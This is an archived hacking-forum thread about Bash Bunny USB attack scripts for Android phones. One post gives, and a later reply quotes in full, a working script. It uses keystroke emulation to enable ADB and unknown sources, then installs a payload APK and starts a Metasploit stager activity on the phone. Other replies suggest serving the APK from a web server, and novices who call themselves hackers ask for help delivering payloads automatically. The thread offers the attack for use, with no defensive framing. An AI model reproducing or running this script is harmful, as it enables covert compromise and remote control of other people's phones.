r1ddl3r Posted April 13, 2017 Share Posted April 13, 2017 Put together a quick and dirty bash bunny script. Allows unknown sources on Android device, grabs apk via webrowser, installs and opens. https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt Also working to get adb delivery method working. Curious if anyone knows of a Android keyboard shortcut that will quickly up settings to speed this up? Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 13, 2017 Share Posted April 13, 2017 Cool payload, here's a couple of suggestions. Put the key commands in a text file under a folder called phones. This will allow someone else to modify the payload for numerous other phones. e.g. phones/nexus9_v7.0.txt, phones/galaxys7_v7.0.txt Use the bash bunny as an ethernet device and pull the payload from a webserver there, so you don't rely on any external infrastructure. Good stuff! One more note, you could start and try the adb method in case the phone has USB debugging enabled. If not you can fall back to the key commands. I am working on a similar payload for android, but it doesn't have to do with apk's Link to comment Share on other sites More sharing options...
r1ddl3r Posted April 13, 2017 Author Share Posted April 13, 2017 Awesome suggestions thank you! I'll work on those and update accordingly. There is also the option of simply enabling USB debugging which I'm testing out as well. Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 13, 2017 Share Posted April 13, 2017 Check this out too -- may be double work https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/android/open_url Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 18, 2017 Share Posted April 18, 2017 Not sure if this is what your payload does but what you could do is... Run a python webserver that serves an .apk, the BB telling the phone to download it (open 172.16.64.1:80 in browser using HID) and install it. Link to comment Share on other sites More sharing options...
Shadowharvy Posted September 24, 2018 Share Posted September 24, 2018 I use this a lot myself. # Enables ADB and unknown sources on a target abdroid # Then pushes a payload APK via ADB # # Requires android-tools-adb installed on the Bash Bunny # # Purple ............Running HID emulation, enabling ADB and unknown sources # Blue Blinking ...............Running ADB command to push payload.apk # Red Blinking.......android failed to get an IP address from the Bash Bunny # Green..............Finished LED SETUP GET TARGET_IP GET SWITCH_POSITION ATTACKMODE HID LED ATTACK Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q DOWNARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 500 Q ENTER Q DELAY 500 Q DOWNARROW Q DELAY 800 Q ENTER Q DELAY 800 Q ENTER Q DELAY 500 Q DOWNARROW Q DELAY 500 Q DOWNARROW Q DELAY 500 Q ENTER Q DELAY 200 Q ENTER Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE ATTACKMODE ECM_ETHERNET LED B 2000 if [ -z "${TARGET_IP}" ]; then LED FAIL exit 1 fi adb connect ${TARGET_IP} adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" LED FINISH Link to comment Share on other sites More sharing options...
Benny639 Posted October 1, 2018 Share Posted October 1, 2018 Hi there! Can you please explain only little bit about this technique means what is it and why it is used?or guide me where i can find results about this...Actually i am a new hacker and have less knowledge in hacking android...i can hack android 5 and 4 easily with evil-droid or metasploit or FATRAt...so i need some more knowledge..help..Thank you! Link to comment Share on other sites More sharing options...
J1m Posted October 12, 2018 Share Posted October 12, 2018 Which payloads have you tried? Link to comment Share on other sites More sharing options...
pati Posted October 22, 2018 Share Posted October 22, 2018 On 9/24/2018 at 9:34 PM, Shadowharvy said: I use this a lot myself. # Enables ADB and unknown sources on a target abdroid # Then pushes a payload APK via ADB # # Requires android-tools-adb installed on the Bash Bunny # # Purple ............Running HID emulation, enabling ADB and unknown sources # Blue Blinking ...............Running ADB command to push payload.apk # Red Blinking.......android failed to get an IP address from the Bash Bunny # Green..............Finished LED SETUP GET TARGET_IP GET SWITCH_POSITION ATTACKMODE HID LED ATTACK Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q DOWNARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 200 Q RIGHTARROW Q DELAY 500 Q ENTER Q DELAY 500 Q DOWNARROW Q DELAY 800 Q ENTER Q DELAY 800 Q ENTER Q DELAY 500 Q DOWNARROW Q DELAY 500 Q DOWNARROW Q DELAY 500 Q ENTER Q DELAY 200 Q ENTER Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE Q DELAY 200 Q ESCAPE ATTACKMODE ECM_ETHERNET LED B 2000 if [ -z "${TARGET_IP}" ]; then LED FAIL exit 1 fi adb connect ${TARGET_IP} adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" LED FINISH hello Shadowharvy im trying to execute a payload with a samsung galaxy s3, i have been working with the payload for android url_open but only can download my apk, im interesting in this part of your code adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk, i think it is more easy for just insert the usb bash bunny and it will search our payload and execute it automaticly. how can i install this requires ? # Requires android-tools-adb installed on the Bash Bunny Thanks Link to comment Share on other sites More sharing options...
Junior247 Posted February 25, 2019 Share Posted February 25, 2019 Hi, Can someone please help me deliver an automatic payload that enables unknown sources on Android? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.